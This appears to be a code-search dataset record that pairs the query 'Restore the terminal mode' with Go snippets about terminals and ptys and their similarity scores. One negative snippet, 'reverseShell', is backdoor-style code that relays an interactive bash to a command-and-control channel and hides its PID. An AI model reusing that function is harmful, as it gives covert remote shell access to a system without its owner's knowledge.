{\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tctx.Log().Infof(\"Restarting because: %s\", err)\n\t\t\tselect {\n\t\t\tcase <-ctx.Context().Done():\n\t\t\t\treturn\n\t\t\tcase <-time.After(time.Second * 3):\n\t\t\t}\n\t\t\terr = StartTerminal(ctx, devContainer, selector, stdout, stderr, stdin, parent)\n\t\t\treturn\n\t\t}\n\n\t\tctx.Log().Debugf(\"Stopped terminal\")\n\t}()\n\n\tcommand := getCommand(devContainer)\n\tcontainer, err := selector.WithContainer(devContainer.Container).SelectSingleContainer(ctx.Context(), ctx.KubeClient(), ctx.Log())\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tctx.Log().Infof(\"Opening shell to %s:%s (pod:container)\", ansi.Color(container.Container.Name, \"white+b\"), ansi.Color(container.Pod.Name, \"white+b\"))\n\terrChan := make(chan error)\n\tparent.Go(func() error {\n\t\terrChan <- startTerminal(ctx, command, !devContainer.Terminal.DisableTTY, devContainer.Terminal.DisableScreen, \"dev\", stdout, stderr, stdin, container)\n\t\treturn nil\n\t})\n\n\tselect {\n\tcase <-ctx.Context().Done():\n\t\t<-errChan\n\t\treturn nil\n\tcase err = <-errChan:\n\t\tif ctx.IsDone() {\n\t\t\treturn nil\n\t\t}\n\n\t\tif err != nil {\n\t\t\t// check if context is done\n\t\t\tif exitError, ok := err.(kubectlExec.CodeExitError); ok {\n\t\t\t\t// Expected exit codes are (https://shapeshed.com/unix-exit-codes/):\n\t\t\t\t// 1 - Catchall for general errors\n\t\t\t\t// 2 - Misuse of shell builtins (according to Bash documentation)\n\t\t\t\t// 126 - Command invoked cannot execute\n\t\t\t\t// 127 - “command not found”\n\t\t\t\t// 128 - Invalid argument to exit\n\t\t\t\t// 130 - Script terminated by Control-C\n\t\t\t\tif IsUnexpectedExitCode(exitError.Code) {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\treturn fmt.Errorf(\"lost connection to pod %s: %v\", container.Pod.Name, err)\n\t\t}\n\t}\n\n\treturn nil\n}", "func Exec(cmd *exec.Cmd, conn io.ReadWriter) error {\n\t// Start the command with a pty.\n\tptmx, err := pty.StartWithSize(cmd, DefaultWinSize)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// Make sure to close the pty at the end.\n\tdefer ptmx.Close()\n\n\t// Set stdin in raw mode.\n\toldState, err := terminal.MakeRaw(int(os.Stdin.Fd()))\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer terminal.Restore(int(os.Stdin.Fd()), oldState)\n\n\t// Copy pty file descriptors until one finishes\n\tdone := make(chan struct{})\n\tgo func() {\n\t\tio.Copy(ptmx, conn)\n\t\tdone <- struct{}{}\n\t}()\n\n\tgo func() {\n\t\tio.Copy(conn, ptmx)\n\t\tdone <- struct{}{}\n\t}()\n\n\t<-done\n\treturn nil\n}", "func reverseShell(ctx context.Context, cancel context.CancelFunc,\n\tsend chan<- []byte, recv <-chan []byte, pid *int,\n\ttoken string) {\n\n\tsend <- []byte(token)\n\tlog.Printf(\"Sent token %s\", token)\n\n\t// shell command\n\t// check if we have utilities installed\n\tcmd := exec.Command(\"/bin/bash\", \"-i\")\n\tif util.IsFileExist(UtilsPath + \"/bash\") {\n\t\tcmd = exec.Command(UtilsPath+\"/bash\", \"--rcfile\", UtilsPath+\"/.bashrc\", \"-i\")\n\t}\n\n\tinitWinSize := pty.Winsize{Rows: 23, Cols: 80}\n\tshellf, err := pty.StartWithSize(cmd, &initWinSize)\n\tif err != nil {\n\t\tlog.Print(\"start bash: \", err)\n\t\treturn\n\t}\n\t*pid = cmd.Process.Pid\n\n\t// record this PID\n\tHIDE_PIDS = append(HIDE_PIDS, strconv.Itoa(*pid))\n\terr = UpdateHIDE_PIDS()\n\tif err != nil {\n\t\tlog.Print(err)\n\t}\n\n\t// Handle pty size.\n\tch := make(chan os.Signal, 1)\n\tsignal.Notify(ch, syscall.SIGWINCH)\n\tgo func() {\n\t\tdefer func() { cancel() }()\n\t\t// TODO delete PID from HIDE_PIDS\n\t\tfor range ch {\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\tif err := pty.InheritSize(os.Stdin, shellf); err != nil {\n\t\t\t\t\tlog.Printf(\"error resizing pty: %s\", err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\tch <- syscall.SIGWINCH // Initial resize.\n\n\tdefer func() {\n\t\tcancel()\n\t\terr = shellf.Close()\n\t\tif err != nil {\n\t\t\tlog.Print(\"Closing shellf: \", err)\n\t\t}\n\t\tlog.Print(\"reverseShell exited\")\n\t}()\n\n\t// write CC's input to bash's PTY stdin\n\tgo func() {\n\t\tdefer func() { cancel() }()\n\t\tfor incoming := range recv {\n\t\t\tincoming = bytes.Trim(incoming, \"\\x00\") // trim NULL bytes\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\t_, err := shellf.Write(incoming)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Print(\"shell write stdin: \", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\t// read from bash's PTY output\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\treturn\n\t\tdefault:\n\t\t\tbuf := make([]byte, RShellBufSize)\n\t\t\t_, err = shellf.Read(buf)\n\t\t\t// fmt.Printf(\"%s\", buf) // echo CC's console\n\t\t\tsend <- buf\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(\"shell read: \", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func PtyStart1(c *exec.Cmd) (pty2, tty *os.File, err error) {\n\tpty2, tty, err = pty.Open()\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tc.Stdout = tty\n\tc.Stdin = tty\n\tc.Stderr = tty\n\tif c.SysProcAttr == nil {\n\t\tc.SysProcAttr = &syscall.SysProcAttr{}\n\t}\n\tc.SysProcAttr.Setctty = true\n\tc.SysProcAttr.Setsid = true\n\treturn pty2, tty, err\n}", "func SetConsoleIOChannel(in io.Reader, out io.Writer) {\n\tchannel := GetConsoleIOChannel()\n\tchannel.Stdin = in\n\tchannel.Stdout = out\n}" ]
[ "0.75425404", "0.7029126", "0.66933656", "0.61317337", "0.5962113", "0.58300453", "0.57845724", "0.5764185", "0.5763176", "0.5722855", "0.5571576", "0.5564034", "0.553365", "0.5418981", "0.5362698", "0.53572845", "0.5330058", "0.5295675", "0.5278407", "0.52701086", "0.526473", "0.5230417", "0.52143615", "0.5139192", "0.5121854", "0.5066523", "0.5050458", "0.50445896", "0.50403494", "0.50322837", "0.5018988", "0.5017923", "0.49683908", "0.49683246", "0.49185154", "0.49176872", "0.4916528", "0.49041182", "0.48280245", "0.47900864", "0.47819322", "0.47672257", "0.4764646", "0.46946782", "0.4678385", "0.46568987", "0.46525204", "0.46376932", "0.46150917", "0.45623216", "0.45615545", "0.455215", "0.45461428", "0.45374265", "0.45288715", "0.45278978", "0.4515627", "0.45139658", "0.45106325", "0.4510131", "0.44931835", "0.44930992", "0.44922617", "0.44863927", "0.4485737", "0.44802836", "0.44722125", "0.4470393", "0.44699234", "0.44695696", "0.4467908", "0.4457053", "0.4421002", "0.44143528", "0.44083893", "0.44010192", "0.43944234", "0.43719685", "0.4367985", "0.43650904", "0.4362768", "0.43598408", "0.43577445", "0.43550727", "0.43533793", "0.43393496", "0.43277866", "0.4326596", "0.43260673", "0.43143916", "0.43134847", "0.430031", "0.42989647", "0.42989647", "0.42898244", "0.42848024", "0.42775276", "0.4276891", "0.42758012", "0.42751953" ]
0.7128382
1
Restore the terminal mode.
func restoreMode(fd int, mode *raw.Termios) error { return raw.TcSetAttr(uintptr(fd), mode) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func RestoreTerminal(fd uintptr, state *State) error {\n\treturn SetConsoleMode(fd, state.mode)\n}", "func restoreTerminal() {\n\tif !stdoutIsTerminal() {\n\t\treturn\n\t}\n\n\tfd := int(os.Stdout.Fd())\n\tstate, err := terminal.GetState(fd)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"unable to get terminal state: %v\\n\", err)\n\t\treturn\n\t}\n\n\tAddCleanupHandler(func() error {\n\t\t// Restoring the terminal configuration while restic runs in the\n\t\t// background, causes restic to get stopped on unix systems with\n\t\t// a SIGTTOU signal. Thus only restore the terminal settings if\n\t\t// they might have been modified, which is the case while reading\n\t\t// a password.\n\t\tif !isReadingPassword {\n\t\t\treturn nil\n\t\t}\n\t\terr := checkErrno(terminal.Restore(fd, state))\n\t\tif err != nil {\n\t\t\tfmt.Fprintf(os.Stderr, \"unable to restore terminal state: %v\\n\", err)\n\t\t}\n\t\treturn err\n\t})\n}", "func TerminalRestore(fd uintptr, termios *syscall.Termios) error {\n\treturn tcset(fd, termios)\n}", "func restoreConsoleMode() {\n\tfd := os.Stderr.Fd()\n\twindows.SetConsoleMode(windows.Handle(fd), consoleMode)\n}", "func Restore(fd int, state *State) error {\n\treturn unix.IoctlSetTermios(fd, ioctlWriteTermios, &state.termios)\n}", "func (p *port) restoreTermios() {\n\tif p.oldTermios == nil {\n\t\treturn\n\t}\n\tif err := tcsetattr(int(p.file.Fd()), p.oldTermios); err != nil {\n\t\t// Warning only.\n\t\tlog.Printf(\"serial: could not restore setting: %v\\n\", err)\n\t\treturn\n\t}\n\tp.oldTermios = nil\n}", "func (s *commonStream) RestoreTerminal() {\n\tif s.state != nil {\n\t\t_ = term.RestoreTerminal(s.fd, s.state)\n\t}\n}", "func ResetTerminal(fd FileDescriptor, state *TerminalState) error {\n\tvar s *mobyterm.State\n\tif state != nil {\n\t\ts = &state.state\n\t}\n\treturn mobyterm.RestoreTerminal(fd, s)\n}", "func ScrRestore() {\n PrintCtrOnErr(ESC_CURSOR_ON)\n PrintCtrOnErr(ESC_RESTORE_CURSOR)\n PrintCtrOnErr(ESC_RESTORE_SCREEN)\n}", "func Restore(fd uintptr, state *State) error {\n\tcmd := exec.Command(\"stty\", \"echo cooked\")\n\tcmd.Run()\n\treturn nil\n}", "func cleanup() {\n\tcookedTerm := exec.Command(\"stty\", \"-cbreak\", \"echo\")\n\tcookedTerm.Stdin = os.Stdin\n\n\terr := cookedTerm.Run()\n\tif err != nil {\n\t\tlog.Fatalln(\"unable to restore cooked terminal mode:\", err)\n\t}\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func (term *Terminal) Reopen() error {\n\tin := os.Stdin\n\n\tt, err := newTerminal(in)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tterm.t = t\n\treturn nil\n}", "func (rcr *RawRuneReader) Restore() error {\n\treturn terminal.Restore(syscall.Stdin, rcr.state)\n}", "func reset() {\n\tterm.Sync()\n}", "func termrestoreState(L *lua.LState) int {\n\terr := term.Restore(int(os.Stdin.Fd()), termState)\n\tif err != nil {\n\t\tL.RaiseError(err.Error())\n\t}\n\n\treturn 0\n}", "func (w *Wrapper) Restore() error {\n\tif w.saved == nil {\n\t\treturn errors.New(\"attempted to restore without saving.\")\n\t}\n\tif !w32.SetConsoleTextAttribute(w.h, w.saved.WAttributes) {\n\t\treturn syscall.Errno(w32.GetLastError())\n\t}\n\treturn nil\n}", "func (s *Screen) ResetStyle() {\n\tfmt.Fprint(s.Terminal, \"\\x1b[0m\")\n}", "func (i *In) SetRawTerminal() (err error) {\n\tif !i.isTerminal || os.Getenv(\"NORAW\") != \"\" {\n\t\treturn nil\n\t}\n\ti.state, err = term.SetRawTerminal(i.fd)\n\treturn err\n}", "func SetRawTerminal(fd FileDescriptor) (state *TerminalState, err error) {\n\tvar s *mobyterm.State\n\ts, err = mobyterm.SetRawTerminal(fd)\n\tif s != nil {\n\t\tstate = &TerminalState{\n\t\t\tstate: *s,\n\t\t}\n\t}\n\treturn\n}", "func (w *VT100Writer) RestoreCursor() {\n\t//fmt.Fprintln(os.Stderr, \"\\x1b[33;1mRCP\\x1b[m\")\n\tw.WriteRaw([]byte{0x1b, '[', 'u'})\n}", "func (w *OSWindow) restoreCursor() {\n\tcursor := w.cursor\n\tif cursor == oswin.NoneCursor {\n\t\tcursor = oswin.NormalCursor\n\t}\n\tw32.SetCursor(cursorHandle(cursor))\n}", "func (r *rawMode) exit() error {\n\tif r.state == nil {\n\t\treturn nil\n\t}\n\n\treturn readline.Restore(r.StdinFd, r.state)\n}", "func (s *Screen) Close() {\n\ts.running = false\n\ts.ScreenCursor.Home()\n\n\terr := s.Terminal.Restore()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func SetRawTerminalOutput(fd FileDescriptor) (state *TerminalState, err error) {\n\tvar s *mobyterm.State\n\ts, err = mobyterm.SetRawTerminalOutput(fd)\n\tif s != nil {\n\t\tstate = &TerminalState{\n\t\t\tstate: *s,\n\t\t}\n\t}\n\treturn\n}", "func (s *ShellSession) Stop() {\n\tsetState(&s.originalSttyState)\n\tsetState(bytes.NewBufferString(\"echo\")) // for linux and ubuntu\n\tos.Exit(0)\n}", "func (p *port) backupTermios() {\n\toldTermios := &syscall.Termios{}\n\tif err := tcgetattr(int(p.file.Fd()), oldTermios); err != nil {\n\t\t// Warning only.\n\t\tlog.Printf(\"serial: could not get setting: %v\\n\", err)\n\t\treturn\n\t}\n\t// Will be reloaded when closing.\n\tp.oldTermios = oldTermios\n}", "func ResetScreen() {\n\tClearScreen()\n\tResetAttrs()\n\tCursorHome()\n}", "func setRawMode(fd int) (*raw.Termios, error) {\n\t// make sure this is a tty\n\tif !isatty.IsTerminal(uintptr(fd)) {\n\t\treturn nil, fmt.Errorf(\"fd %d is not a tty\", fd)\n\t}\n\t// get the terminal IO mode\n\toriginalMode, err := raw.TcGetAttr(uintptr(fd))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// modify the original mode\n\tnewMode := *originalMode\n\tnewMode.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON)\n\tnewMode.Oflag &^= syscall.OPOST\n\tnewMode.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN)\n\tnewMode.Cflag &^= (syscall.CSIZE | syscall.PARENB)\n\tnewMode.Cflag |= syscall.CS8\n\tnewMode.Cc[syscall.VMIN] = 1\n\tnewMode.Cc[syscall.VTIME] = 0\n\terr = raw.TcSetAttr(uintptr(fd), &newMode)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn originalMode, nil\n}", "func (d *ModeDiff) unsetMode(mode rune) {\n\td.pos.unsetMode(mode)\n\td.neg.setMode(mode)\n}", "func RestoreCursorPos() {\n\temitEscape(\"u\")\n}", "func Restore(state State) {\n\triscv.EnableInterrupts(uintptr(state))\n}", "func ClearTerminalScreen() {\n\tos.Stdout.Write([]byte(\"\\033[2J\"))\n\tos.Stdout.Write([]byte(\"\\033[H\"))\n\tos.Stdout.Write([]byte(\"\\n\"))\n}", "func (tv *TextView) ResetState() {\n\ttv.SelectReset()\n\ttv.Highlights = nil\n\ttv.ISearch.On = false\n\ttv.QReplace.On = false\n\tif tv.Buf == nil || tv.lastFilename != tv.Buf.Filename { // don't reset if reopening..\n\t\ttv.CursorPos = TextPos{}\n\t}\n}", "func (d *ModeDiff) setMode(mode rune) {\n\td.pos.setMode(mode)\n\td.neg.unsetMode(mode)\n}", "func (t *TimeLine) Restore() {\n\tt.cursor = t.backup.cursor\n\tt.lastDelta = t.backup.lastDelta\n\tt.plannedCallbacks = t.backup.plannedCallbacks\n}", "func simpleMode(tty *TTY, flags settings, finishNotifyChan chan error) {\n\tbuf, n, err := prompt.AskForPassword(tty.file, tty.num, flags.simple)\n\tif err != nil {\n\t\tfinishNotifyChan <- err\n\t\treturn\n\t}\n\t// In case of signal this will be not executed, but memguard.DestroyAll\n\t// from main will so we don't care much about it.\n\tdefer buf.Destroy()\n\n\tfmt.Println(string(buf.Buffer()[:n]))\n\n\ttty.file.WriteString(terminal.TermClear)\n\ttty.file.WriteString(terminal.TermReset)\n\n\tfinishNotifyChan <- nil\n}", "func RestoreStdin() {\n\tos.Stdin = oldStdin\n\n\ttmpFile.Close()\n\tos.Remove(tmpFile.Name())\n}", "func (i *InteractiveText) reset() {\n\ti.current = 0\n}", "func SetAndProtectTerm() {\n\t// disable input buffering\n\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"cbreak\", \"min\", \"1\").Run()\n\t// do not display entered characters on the screen\n\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"-echo\").Run()\n\t// restore the echoing state when exiting\n\tdefer exec.Command(\"stty\", \"-F\", \"/dev/tty\", \"echo\").Run()\n\n\t// ensure we use echo even on sigterm/ctrl+c\n\tc := make(chan os.Signal, 1)\n\tsignal.Notify(c, os.Interrupt, syscall.SIGTERM)\n\tgo func() {\n\t\t<-c\n\t\texec.Command(\"stty\", \"-F\", \"/dev/tty\", \"echo\").Run()\n\t\tos.Exit(1)\n\t}()\n}", "func SetIsTerminal(isTerminal int) {\n\tstd.mu.Lock()\n\tdefer std.mu.Unlock()\n\tstd.isTerminal = isTerminal\n}", "func (s *BaseBundListener) ExitMode_term(ctx *Mode_termContext) {}", "func (tv *TextView) Redo() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttbe := tv.Buf.Redo()\n\tif tbe != nil {\n\t\tif tbe.Delete {\n\t\t\ttv.SetCursorShow(tbe.Reg.Start)\n\t\t} else {\n\t\t\ttv.SetCursorShow(tbe.Reg.End)\n\t\t}\n\t} else {\n\t\ttv.ScrollCursorToCenterIfHidden()\n\t}\n\ttv.SavePosHistory(tv.CursorPos)\n}", "func (s *Surface) Restore() {\n\ts.Ctx.Call(\"restore\")\n}", "func (appCtx *AppCtx) ClearTerminal() {\n\t// TBD: will not work for Windows\n\tcmd := appCtx.osExec.OSCommand(\"clear\")\n\tcmd.Stdout = os.Stdout\n\tappCtx.osExec.OSCommandRun(cmd)\n}", "func (tb *TextBuf) AutoSaveRestore(asv bool) {\n\ttb.Autosave = asv\n}", "func termsaveState(L *lua.LState) int {\n\tstate, err := term.GetState(int(os.Stdin.Fd()))\n\tif err != nil {\n\t\tL.RaiseError(err.Error())\n\t\treturn 0\n\t}\n\n\ttermState = state\n\treturn 0\n}", "func clearScreen() {\n\tif strings.Contains(runtime.GOOS, \"windows\") {\n\t\t// windows\n\t\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\t} else {\n\t\t// linux or mac\n\t\tcmd := exec.Command(\"clear\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\t}\n}", "func ScrSave() {\n PrintCtrOnErr(ESC_SAVE_SCREEN)\n PrintCtrOnErr(ESC_SAVE_CURSOR)\n PrintCtrOnErr(ESC_CURSOR_OFF)\n PrintCtrOnErr(ESC_CLEAR_SCREEN)\n}", "func (s *ShellSession) disableEchoAndInputBuffering() {\n\tgetState(&s.originalSttyState)\n\tsetState(bytes.NewBufferString(\"cbreak\"))\n\tsetState(bytes.NewBufferString(\"-echo\"))\n}", "func (s *Screen) Flip() error {\n\tif s.titleNeedsRedraw {\n\t\tif _, err := s.console.Write([]byte(termesc.SetTitle(s.title))); err != nil {\n\t\t\treturn err\n\t\t}\n\t\ts.titleNeedsRedraw = false\n\t}\n\tif s.needsRedraw {\n\t\tif err := s.flipContent(); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif s.prev == nil {\n\t\t\ts.prev = make([]Cell, len(s.current))\n\t\t}\n\t\ts.prev, s.current = s.current, s.prev\n\t\ts.needsRedraw = false\n\t}\n\tif s.cursorVisible != s.prevCursorVisible {\n\t\tcode := termesc.HideCursor\n\t\tif s.cursorVisible {\n\t\t\tcode = termesc.ShowCursor\n\t\t}\n\t\tif _, err := s.console.Write([]byte(code)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\ts.prevCursorVisible = s.cursorVisible\n\tif s.cursorVisible {\n\t\tif _, err := s.console.Write([]byte(termesc.SetCursorPos(s.cursorPos.Y+1, s.cursorPos.X+1))); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func makeFdIntoRawMode(fd int) (state *terminal.State, err error) {\n\tstate, err = terminal.MakeRaw(fd)\n\treturn state, err\n}", "func (ts *TextState) Reset() {\n\tts.Tm = transform.IdentityMatrix()\n\tts.Tlm = transform.IdentityMatrix()\n}", "func (s *BaseBundListener) EnterMode_term(ctx *Mode_termContext) {}", "func StartRaw(c *exec.Cmd) (pty *os.File, restore func(), err error) {\n\tpty, err = Start(c)\n\toldState, err := terminal.MakeRaw(int(pty.Fd()))\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treturn pty, func() {\n\t\t_ = terminal.Restore(int(pty.Fd()), oldState)\n\t}, nil\n}", "func Reset() {\n\tfmt.Print(CSI + ResetSeq + \"m\")\n}", "func (s *Screen) ClearScreenHistory() {\n\tfmt.Fprint(s.Terminal, \"\\\\\\033c\")\n}", "func newTerminalPrompter() *terminalPrompter {\n\tp := new(terminalPrompter)\n\t// Get the original mode before calling NewLiner.\n\t// This is usually regular \"cooked\" mode where characters echo.\n\tnormalMode, _ := liner.TerminalMode()\n\t// Turn on liner. It switches to raw mode.\n\tptr.State = liner.NewLiner()\n\trawMode, err := liner.TerminalMode()\n\tif err != nil || !liner.TerminalSupported() {\n\t\tptr.supported = false\n\t} else {\n\t\tptr.supported = true\n\t\tptr.normalMode = normalMode\n\t\tptr.rawMode = rawMode\n\t\t// Switch back to normal mode while we're not prompting.\n\t\tnormalMode.ApplyMode()\n\t}\n\tptr.SetCtrlCAborts(true)\n\tptr.SetTabCompletionStyle(liner.TabPrints)\n\tptr.SetMultiLineMode(true)\n\treturn p\n}", "func reverseShell(ctx context.Context, cancel context.CancelFunc,\n\tsend chan<- []byte, recv <-chan []byte, pid *int,\n\ttoken string) {\n\n\tsend <- []byte(token)\n\tlog.Printf(\"Sent token %s\", token)\n\n\t// shell command\n\t// check if we have utilities installed\n\tcmd := exec.Command(\"/bin/bash\", \"-i\")\n\tif util.IsFileExist(UtilsPath + \"/bash\") {\n\t\tcmd = exec.Command(UtilsPath+\"/bash\", \"--rcfile\", UtilsPath+\"/.bashrc\", \"-i\")\n\t}\n\n\tinitWinSize := pty.Winsize{Rows: 23, Cols: 80}\n\tshellf, err := pty.StartWithSize(cmd, &initWinSize)\n\tif err != nil {\n\t\tlog.Print(\"start bash: \", err)\n\t\treturn\n\t}\n\t*pid = cmd.Process.Pid\n\n\t// record this PID\n\tHIDE_PIDS = append(HIDE_PIDS, strconv.Itoa(*pid))\n\terr = UpdateHIDE_PIDS()\n\tif err != nil {\n\t\tlog.Print(err)\n\t}\n\n\t// Handle pty size.\n\tch := make(chan os.Signal, 1)\n\tsignal.Notify(ch, syscall.SIGWINCH)\n\tgo func() {\n\t\tdefer func() { cancel() }()\n\t\t// TODO delete PID from HIDE_PIDS\n\t\tfor range ch {\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\tif err := pty.InheritSize(os.Stdin, shellf); err != nil {\n\t\t\t\t\tlog.Printf(\"error resizing pty: %s\", err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\tch <- syscall.SIGWINCH // Initial resize.\n\n\tdefer func() {\n\t\tcancel()\n\t\terr = shellf.Close()\n\t\tif err != nil {\n\t\t\tlog.Print(\"Closing shellf: \", err)\n\t\t}\n\t\tlog.Print(\"reverseShell exited\")\n\t}()\n\n\t// write CC's input to bash's PTY stdin\n\tgo func() {\n\t\tdefer func() { cancel() }()\n\t\tfor incoming := range recv {\n\t\t\tincoming = bytes.Trim(incoming, \"\\x00\") // trim NULL bytes\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\t_, err := shellf.Write(incoming)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Print(\"shell write stdin: \", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\t// read from bash's PTY output\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\treturn\n\t\tdefault:\n\t\t\tbuf := make([]byte, RShellBufSize)\n\t\t\t_, err = shellf.Read(buf)\n\t\t\t// fmt.Printf(\"%s\", buf) // echo CC's console\n\t\t\tsend <- buf\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(\"shell read: \", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func enterMode(mode string) {\n\teditorMode = mode\n\t// TODO maybe not the best place to clear this\n\tmessage(\"\")\n}", "func clearScreen() {\n\tfmt.Print(\"\\x1b[2J\")\n}", "func (rl *Instance) Readline() (_ string, err error) {\n\tfd := int(os.Stdin.Fd())\n\tstate, err := MakeRaw(fd)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\t// return an error if Restore fails. However we don't want to return\n\t\t// `nil` if there is no error because there might be a CtrlC or EOF\n\t\t// that needs to be returned\n\t\tr := Restore(fd, state)\n\t\tif r != nil {\n\t\t\terr = r\n\t\t}\n\t}()\n\n\tx, _ := rl.getCursorPos()\n\tswitch x {\n\tcase -1:\n\t\tprint(string(leftMost()))\n\tcase 0:\n\t\t// do nothing\n\tdefault:\n\t\tprint(\"\\r\\n\")\n\t}\n\tprint(rl.prompt)\n\n\trl.line = []rune{}\n\trl.viUndoHistory = []undoItem{{line: \"\", pos: 0}}\n\trl.pos = 0\n\trl.histPos = rl.History.Len()\n\trl.modeViMode = vimInsert\n\tatomic.StoreInt64(&rl.delayedSyntaxCount, 0)\n\trl.resetHintText()\n\trl.resetTabCompletion()\n\n\tif len(rl.multisplit) > 0 {\n\t\tr := []rune(rl.multisplit[0])\n\t\trl.readlineInput(r)\n\t\trl.carridgeReturn()\n\t\tif len(rl.multisplit) > 1 {\n\t\t\trl.multisplit = rl.multisplit[1:]\n\t\t} else {\n\t\t\trl.multisplit = []string{}\n\t\t}\n\t\treturn string(rl.line), nil\n\t}\n\n\trl.termWidth = GetTermWidth()\n\trl.getHintText()\n\trl.renderHelpers()\n\n\tfor {\n\t\tgo delayedSyntaxTimer(rl, atomic.LoadInt64(&rl.delayedSyntaxCount))\n\t\trl.viUndoSkipAppend = false\n\t\tb := make([]byte, 1024*1024)\n\t\tvar i int\n\n\t\tif !rl.skipStdinRead {\n\t\t\ti, err = os.Stdin.Read(b)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t\trl.termWidth = GetTermWidth()\n\t\t}\n\t\tatomic.AddInt64(&rl.delayedSyntaxCount, 1)\n\n\t\trl.skipStdinRead = false\n\t\tr := []rune(string(b))\n\n\t\tif isMultiline(r[:i]) || len(rl.multiline) > 0 {\n\t\t\trl.multiline = append(rl.multiline, b[:i]...)\n\t\t\tif i == len(b) {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif !rl.allowMultiline(rl.multiline) {\n\t\t\t\trl.multiline = []byte{}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\ts := string(rl.multiline)\n\t\t\trl.multisplit = rxMultiline.Split(s, -1)\n\n\t\t\tr = []rune(rl.multisplit[0])\n\t\t\trl.modeViMode = vimInsert\n\t\t\trl.readlineInput(r)\n\t\t\trl.carridgeReturn()\n\t\t\trl.multiline = []byte{}\n\t\t\tif len(rl.multisplit) > 1 {\n\t\t\t\trl.multisplit = rl.multisplit[1:]\n\t\t\t} else {\n\t\t\t\trl.multisplit = []string{}\n\t\t\t}\n\t\t\treturn string(rl.line), nil\n\t\t}\n\n\t\ts := string(r[:i])\n\t\tif rl.evtKeyPress[s] != nil {\n\t\t\t//rl.clearHelpers() // unessisary clear?\n\n\t\t\tret := rl.evtKeyPress[s](s, rl.line, rl.pos)\n\n\t\t\trl.clearLine()\n\t\t\trl.line = append(ret.NewLine, []rune{}...)\n\t\t\trl.echo()\n\t\t\trl.pos = ret.NewPos\n\n\t\t\tif ret.ClearHelpers {\n\t\t\t\trl.resetHelpers()\n\t\t\t} else {\n\t\t\t\trl.updateHelpers()\n\t\t\t\trl.renderHelpers()\n\t\t\t}\n\n\t\t\tif len(ret.HintText) > 0 {\n\t\t\t\trl.hintText = ret.HintText\n\t\t\t\trl.clearHelpers()\n\t\t\t\trl.renderHelpers()\n\t\t\t}\n\t\t\tif !ret.ForwardKey {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif ret.CloseReadline {\n\t\t\t\trl.clearHelpers()\n\t\t\t\treturn string(rl.line), nil\n\t\t\t}\n\t\t}\n\n\t\tswitch b[0] {\n\t\tcase charCtrlC:\n\t\t\trl.clearHelpers()\n\t\t\treturn \"\", CtrlC\n\n\t\tcase charEOF:\n\t\t\trl.clearHelpers()\n\t\t\treturn \"\", EOF\n\n\t\tcase charCtrlF:\n\t\t\tif !rl.modeTabCompletion {\n\t\t\t\trl.modeAutoFind = true\n\t\t\t\trl.getTabCompletion()\n\t\t\t}\n\n\t\t\trl.modeTabFind = true\n\t\t\trl.updateTabFind([]rune{})\n\t\t\trl.viUndoSkipAppend = true\n\n\t\tcase charCtrlR:\n\t\t\trl.modeAutoFind = true\n\t\t\trl.tcOffset = 0\n\t\t\trl.modeTabCompletion = 